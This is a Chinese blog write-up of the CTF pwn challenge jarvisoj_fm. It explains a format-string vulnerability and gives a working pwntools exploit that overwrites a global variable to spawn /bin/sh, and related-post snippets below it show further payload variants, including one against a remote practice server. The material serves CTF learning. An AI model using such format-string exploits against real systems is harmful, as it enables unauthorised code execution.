jarvisoj_fm

最新推荐文章于 2025-01-21 17:45:14 发布
原创 最新推荐文章于 2025-01-21 17:45:14 发布 · 4.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #CTF #python #WriteUp #网络安全

该博客介绍了如何分析一个存在栈不可执行和Canary保护的程序,并利用格式化字符串漏洞来修改内存中的值,当x值变为0x4时,触发执行system(/bin/sh)获取shell。通过IDA分析和payload构造,最终成功利用该漏洞。

jarvisoj_fm

使用checksec查看:
在这里插入图片描述
开启了栈不可执行和Canary。

先放进IDA中分析:
在这里插入图片描述

  • printf(&buf);:存在格式化字符串的漏洞。
  • if ( x == 4 ) { puts("running sh..."); system("/bin/sh"); }:只需x处的值为4即可拿到shell。

题目思路

  • 存在格式化字符串漏洞。
  • 利用格式化字符串漏洞将x处数据写成0x4即可getshell。

步骤解析

先用AAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p测试出格式化字符串是第几个参数。

可以看到是第11个参数。

在这里插入图片描述

接着构造payload,需要将x置为0x4,所以用%4c输出四个字符,此时%11$n需要改为%13$n

因为%4c%13$n占了2字节,所以11需要改为13,后面再接上需要覆盖的地址。

最后payload为:b'%4c%13$n' + p32(x_addr)

完整exp

from pwn import *

#start
r = process("../buu/jarvisoj_fm")

#params
x_addr = 0x804A02C

#attack
payload = b'%4c%13$n' + p32(x_addr)
print(payload)
r.sendline(payload)

r.interactive()
jarvisoj_fm[FmtStr]
、moddemod
06-26 419
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './fm' p = process(proc_na.
JarvisOJ fm
PLpa的博客
07-09 1238
这一题是一道格式化字符串漏洞题 关于格式化漏洞的基础,你可以看我前面的博客,里面有提到:https://blog.youkuaiyun.com/qq_43986365/article/details/94896862 拿到这一题,我们仍然是先查看保护: 我们可以看到,简单的格式化漏洞题只开了NX和CANARY保护,好的。 接下来我们就可以进入IDA中看一下程序的具体逻辑: 在这里,我们可以看到有一个明显的...
jarvisoj_fm【BUUCTF
qq_41696518的博客
08-31 431
jarvisoj_fm【BUUCTF
CTFjarvisoj_fm 1
凉水的博客
07-06 675
jarvisoj_fm
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 318
BUUCTF 做题练习
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 374
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
[BUUCTF-pwn]——jarvisoj_fm
Y_peak的博客
02-22 232
[BUUCTF-pwn]—— 题目地址: https://buuoj.cn/challenges#jarvisoj_fm 点击一下writeup 在这里 以前写过所以偷懒一下, 嘿嘿嘿!!! 各位师傅不要见怪呀 ????
BUUCTF jarvisoj_fm
2401_88087539的博客
01-21 311
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
[BUUCTF]PWN——jarvisoj_fm
BangSen1的博客
03-19 403
jarvisoj_fm 例行检查,开启NX和CANARY保护,32位。 运行程序 IDA载入,检索字符串,看见了“/bin/sh”字符串 跟进函数,当x=4的时候执行system(/bin/sh) 存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 payload=p32(x_addr)+"%11$n" 首先传入x参数的地址,这个地址存放在栈上偏移为11的位置,利用%11$n,定位到了偏移为11的位置,往这个位置写入数据,写
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 490
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解题思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
buuctf jarvisoj_fm
carol2358的博客
05-04 276
先运行, AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 得出是第11位,然后p32(x_addr)正好变成4位 from pwn import * r = remote('node3.buuoj.cn', 27373) x_addr = 0x0804A02C p = flat([x_addr, '%1...
buuctf jarvisoj_fm
pondzhang的专栏
03-19 370
存在格式化字符串漏洞 而实际上x的值为3 需要通过格式化字符串漏洞来重写x的值 使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度 格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n,意思将0x0804A02C的x地址写入32位大小的一个...
【BUUCTFjarvisoj_fmjarvisoj_tell_me_something
m0_51251108的博客
12-29 222
【BUUCTFjarvisoj_fm 格式化字符串 exp: from pwn import* r=remote('node3.buuoj.cn',27988) x=0x0804A02C offest=11 payload=p32(x)+'%11$n' payload=payload.ljust(0x50,'p') r.send(payload) r.interactive() 【BUUCTFjarvisoj_tell_me_something 栈溢出 exp: from pwn import* r=
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 836
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
jarvisoj_fm 1
最新发布
03-26
### JarvisOJ FM 功能概述 JarvisOJ 是一个在线编程练习平台,旨在帮助用户提升其逆向工程技能。其中的 FM(File Management)模块主要用于文件管理操作,涉及二进制文件分析、调试以及反汇编等内容[^1]。 FM 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值